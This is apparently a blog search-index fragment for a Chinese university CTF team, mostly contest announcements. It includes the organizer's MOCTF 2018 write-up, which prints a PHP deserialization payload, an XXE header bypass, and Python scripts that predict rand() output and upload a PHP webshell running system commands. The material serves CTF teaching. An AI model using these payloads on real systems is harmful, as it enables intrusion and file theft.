    \u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"

    \u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"

    \u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"
    \u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n

    flag:moctf{500000000}

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"
    \u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

    \u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

    -.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

    \u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
    \u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

    \u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

    <?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

    flag.php

    <?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

    \u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

    ini_set('session.serialize_handler', 'php_binary');\n

    \u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

    $a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
    |O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

    \u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
    \u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

    \u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

    client-ip:localhost\n

    \u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
    \u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

    index.php

    <?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

    \u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

    \u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

    #\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

    put.py

    #\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

    \u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

    \u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

    1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
    2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
    3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
    4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
    5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

    \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

    \u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

    \u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

    \u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

    \u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

    2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

    "},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

    \u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 